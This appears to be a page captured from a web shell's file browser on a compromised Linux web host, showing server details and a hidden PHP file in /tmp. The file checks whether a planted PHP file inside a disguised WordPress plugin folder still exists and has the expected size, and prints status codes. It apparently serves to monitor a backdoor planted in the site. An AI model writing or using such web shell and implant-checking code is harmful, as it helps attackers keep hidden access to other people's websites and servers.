HEX
Server: Apache
System: Linux 162-214-74-50.webhostbox.net 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
User: iideug (1011)
PHP: 8.2.31
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //tmp/.parle_tokens
<?php   $r = '/home/iideug/public_html/saily.iideug.com'; $x = ["/wp-content/plugins/contact-1779188390/widget.area.1779188392.php"=>"bd@@1452776@@1292001"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');